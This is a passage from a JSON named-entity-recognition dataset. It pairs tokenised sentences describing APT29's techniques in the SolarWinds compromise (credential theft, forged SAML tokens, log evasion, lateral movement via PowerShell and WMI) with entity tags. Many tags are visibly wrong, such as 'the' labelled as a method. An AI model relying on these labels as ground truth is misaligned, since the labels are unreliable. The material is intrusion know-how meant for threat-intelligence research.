"B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "7-Zip", - "to", - "compress", - "stolen", - "emails", - "into", - "password-protected", - "archives", - "prior", - "to", - "exfltration;", - "APT29", - "also", - "compressed", - "text", - "files", - "into", - "zipped", - "archives." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "removed", - "evidence", - "of", - "email", - "export", - "requests", - "using", - "`Remove-MailboxExportRequest`." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "a", - "compromised", - "O365", - "administrator", - "account", - "to", - "create", - "a", - "new", - "Service", - "Principal." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "downloaded", - "source", - "code", - "from", - "code", - "repositories." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "was", - "able", - "to", - "get", - "SUNBURST", - "signed", - "by", - "SolarWinds", - "code", - "signing", - "certificates", - "by", - "injecting", - "the", - "malware", - "into", - "the", - "SolarWinds", - "Orion", - "software", - "lifecycle." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "gained", - "initial", - "network", - "access", - "to", - "some", - "victims", - "via", - "a", - "trojanized", - "update", - "of", - "SolarWinds", - "Orion", - "software." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "conducted", - "credential", - "theft", - "operations", - "to", - "obtain", - "credentials", - "to", - "be", - "used", - "for", - "access", - "to", - "victim", - "environments." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "account", - "credentials", - "they", - "obtained", - "to", - "attempt", - "access", - "to", - "Group", - "Managed", - "Service", - "Account", - "(gMSA)", - "passwords." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "stole", - "users'", - "saved", - "passwords", - "from", - "Chrome." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-Exp", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "privileged", - "accounts", - "to", - "replicate", - "directory", - "service", - "data", - "with", - "domain", - "controllers." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "accessed", - "victims'", - "internal", - "knowledge", - "repositories", - "(wikis)", - "to", - "view", - "sensitive", - "corporate", - "information", - "on", - "products,", - "services,", - "and", - "internal", - "business", - "operations." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "extracted", - "files", - "from", - "compromised", - "networks." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "7-Zip", - "to", - "decode", - "their", - "Raindrop", - "malware." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "registered", - "devices", - "in", - "order", - "to", - "enable", - "mailbox", - "syncing", - "via", - "the", - "`Set-CASMailbox`", - "command." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29,", - "used", - "`AUDITPOL`", - "to", - "prevent", - "the", - "collection", - "of", - "audit", - "logs." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "`netsh`", - "to", - "configure", - "firewall", - "rules", - "that", - "limited", - "certain", - "UDP", - "outbound", - "packets." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "the", - "service", - "control", - "manager", - "on", - "a", - "remote", - "system", - "to", - "disable", - "services", - "associated", - "with", - "security", - "monitoring", - "products." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "PowerShell", - "to", - "discover", - "domain", - "accounts", - "by", - "exectuing", - "`Get-ADUser`", - "and", - "`Get-ADGroupMember`." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "domain", - "administrators'", - "accounts", - "to", - "help", - "facilitate", - "lateral", - "movement", - "on", - "compromised", - "networks." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "AdFind", - "to", - "enumerate", - "domain", - "groups." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "the", - "`Get-AcceptedDomain`", - "PowerShell", - "cmdlet", - "to", - "enumerate", - "accepted", - "domains", - "through", - "an", - "Exchange", - "Management", - "Shell.", - "They", - "also", - "used", - "AdFind", - "to", - "enumerate", - "domains", - "and", - "to", - "discover", - "trust", - "between", - "federated", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "acquired", - "C2", - "domains,", - "sometimes", - "through", - "resellers." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "compromised", - "domains", - "to", - "use", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "dynamic", - "DNS", - "resolution", - "to", - "construct", - "and", - "resolve", - "to", - "randomly-generated", - "subdomains", - "for", - "C2." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-Exp", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "exfiltrated", - "collected", - "data", - "over", - "a", - "simple", - "HTTPS", - "request", - "to", - "a", - "password-protected", - "archive", - "staged", - "on", - "a", - "victim's", - "OWA", - "servers." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "exploited", - "CVE-2020-0688", - "against", - "the", - "Microsoft", - "Exchange", - "Control", - "Panel", - "to", - "regain", - "access", - "to", - "a", - "network." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-SecTeam", - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "compromised", - "identities", - "to", - "access", - "networks", - "via", - "SSH,", - "VPNs,", - "and", - "other", - "remote", - "access", - "tools." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "routinely", - "removed", - "their", - "tools,", - "including", - "custom", - "backdoors,", - "once", - "remote", - "access", - "was", - "achieved." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "obtained", - "information", - "about", - "the", - "configured", - "Exchange", - "virtual", - "directory", - "using", - "`Get-WebServicesVirtualDirectory`." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "set", - "the", - "hostnames", - "of", - "their", - "C2", - "infrastructure", - "to", - "match", - "legitimate", - "hostnames", - "in", - "the", - "victim", - "environment.", - "They", - "also", - "used", - "IP", - "addresses", - "originating", - "from", - "the", - "same", - "country", - "as", - "the", - "victim", - "for", - "their", - "VPN", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "temporarily", - "replaced", - "legitimate", - "utilities", - "with", - "their", - "own,", - "executed", - "their", - "payload,", - "and", - "then", - "restored", - "the", - "original", - "file." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "downloaded", - "additional", - "malware,", - "such", - "as", - "TEARDROP", - "and", - "Cobalt", - "Strike,", - "onto", - "a", - "compromised", - "host", - "following", - "initial", - "access." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-Exp", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "SSH", - "port", - "forwarding", - "capabilities", - "on", - "public-facing", - "systems,", - "and", - "configured", - "at", - "least", - "one", - "instance", - "of", - "Cobalt", - "Strike", - "to", - "use", - "a", - "network", - "pipe", - "over", - "SMB." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "GoldFinder", - "to", - "perform", - "HTTP", - "GET", - "requests", - "to", - "check", - "internet", - "connectivity", - "and", - "identify", - "HTTP", - "proxy", - "servers", - "and", - "other", - "redirectors", - "that", - "an", - "HTTP", - "request", - "travels", - "through." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "obtained", - "Ticket", - "Granting", - "Service", - "(TGS)", - "tickets", - "for", - "Active", - "Directory", - "Service", - "Principle", - "Names", - "to", - "crack", - "offline." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "compromised", - "local", - "accounts", - "to", - "access", - "victims'", - "networks." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "numerous", - "pieces", - "of", - "malware", - "that", - "were", - "likely", - "developed", - "for", - "or", - "by", - "the", - "group,", - "including", - "SUNBURST,", - "SUNSPOT,", - "Raindrop,", - "and", - "TEARDROP." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "named", - "tasks", - "`\\Microsoft\\Windows\\SoftwareProtectionPlatform\\EventCacheManager`", - "in", - "order", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "renamed", - "software", - "and", - "DLLs", - "with", - "legitimate", - "names", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "the", - "`Get-ManagementRoleAssignment`", - "PowerShell", - "cmdlet", - "to", - "enumerate", - "Exchange", - "management", - "role", - "assignments", - "through", - "an", - "Exchange", - "Management", - "Shell." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "PowerShell", - "to", - "create", - "new", - "tasks", - "on", - "remote", - "machines,", - "identify", - "configuration", - "settings,", - "exfiltrate", - "data,", - "and", - "execute", - "other", - "commands." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "obtained", - "PKI", - "keys,", - "certificate", - "files,", - "and", - "the", - "private", - "encryption", - "key", - "from", - "an", - "Active", - "Directory", - "Federation", - "Services", - "(AD", - "FS)", - "container", - "to", - "decrypt", - "corresponding", - "SAML", - "signing", - "certificates." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "multiple", - "command-line", - "utilities", - "to", - "enumerate", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "staged", - "data", - "and", - "files", - "in", - "password-protected", - "archives", - "on", - "a", - "victim's", - "OWA", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "RDP", - "sessions", - "from", - "public-facing", - "systems", - "to", - "internal", - "servers." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "collected", - "emails", - "from", - "specific", - "individuals,", - "such", - "as", - "executives", - "and", - "IT", - "staff,", - "using", - "`New-MailboxExportRequest`", - "followed", - "by", - "`Get-MailboxExportRequest`." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "B-Org", - "O", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "AdFind", - "to", - "enumerate", - "remote", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "`Rundll32.exe`", - "to", - "execute", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "created", - "tokens", - "using", - "compromised", - "SAML", - "signing", - "certificates." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "administrative", - "accounts", - "to", - "connect", - "over", - "SMB", - "to", - "targeted", - "users." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "`scheduler`", - "and", - "`schtasks`", - "to", - "create", - "new", - "tasks", - "on", - "remote", - "host", - "as", - "part", - "of", - "their", - "lateral", - "movement.", - "They", - "manipulated", - "scheduled", - "tasks", - "by", - "updating", - "an", - "existing", - "legitimate", - "task", - "to", - "execute", - "their", - "tools", - "and", - "then", - "returned", - "the", - "scheduled", - "task", - "to", - "its", - "original", - "configuration.", - "APT29", - "also", - "created", - "a", - "scheduled", - "task", - "to", - "maintain", - "SUNSPOT", - "persistence", - "when", - "the", - "host", - "booted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "stole", - "Chrome", - "browser", - "cookies", - "by", - "copying", - "the", - "Chrome", - "profile", - "directories", - "of", - "targeted", - "users." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Exp", - "B-Idus", - "O", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "`fsutil`", - "to", - "check", - "available", - "free", - "space", - "before", - "executing", - "actions", - "that", - "might", - "create", - "large", - "files", - "on", - "disk." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "modified", - "timestamps", - "of", - "backdoors", - "to", - "match", - "legitimate", - "Windows", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "changed", - "domain", - "federation", - "trust", - "settings", - "using", - "Azure", - "AD", - "administrative", - "permissions", - "to", - "configure", - "the", - "domain", - "to", - "accept", - "authorization", - "tokens", - "signed", - "by", - "their", - "own", - "SAML", - "signing", - "certificate." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "gained", - "access", - "through", - "compromised", - "accounts", - "at", - "cloud", - "solution", - "partners,", - "and", - "used", - "compromised", - "certificates", - "issued", - "by", - "Mimecast", - "to", - "authenticate", - "to", - "Mimecast", - "customer", - "systems." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "forged", - "SAML", - "tokens", - "that", - "allowed", - "the", - "actors", - "to", - "impersonate", - "users", - "and", - "bypass", - "MFA,", - "enabling", - "APT29", - "to", - "access", - "enterprise", - "cloud", - "applications", - "and", - "services." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "I-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "different", - "compromised", - "credentials", - "for", - "remote", - "access", - "and", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "O", - "O", - "B-Exp", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "For", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "wrote", - "malware", - "such", - "as", - "Sibot", - "in", - "Visual", - "Basic." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "bypassed", - "MFA", - "set", - "on", - "OWA", - "accounts", - "by", - "generating", - "a", - "cookie", - "value", - "from", - "a", - "previously", - "stolen", - "secret", - "key." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "HTTP", - "for", - "C2", - "and", - "data", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "B-OffAct", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "stolen", - "cookies", - "to", - "access", - "cloud", - "resources", - "and", - "a", - "forged", - "`duo-sid`", - "cookie", - "to", - "bypass", - "MFA", - "set", - "on", - "an", - "email", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "WMI", - "for", - "the", - "remote", - "execution", - "of", - "files", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "a", - "WMI", - "event", - "filter", - "to", - "invoke", - "a", - "command-line", - "event", - "consumer", - "at", - "system", - "boot", - "time", - "to", - "launch", - "a", - "backdoor", - "with", - "`rundll32.exe`." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "SolarWinds", - "Compromise,", - "APT29", - "used", - "WinRM", - "via", - "PowerShell", - "to", - "execute", - "commands", - "and", - "payloads", - "on", - "remote", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "the", - "Triton", - "Safety", - "Instrumented", - "System", - "Attack,", - "TEMP.Veles", - "engaged", - "in", - "network", 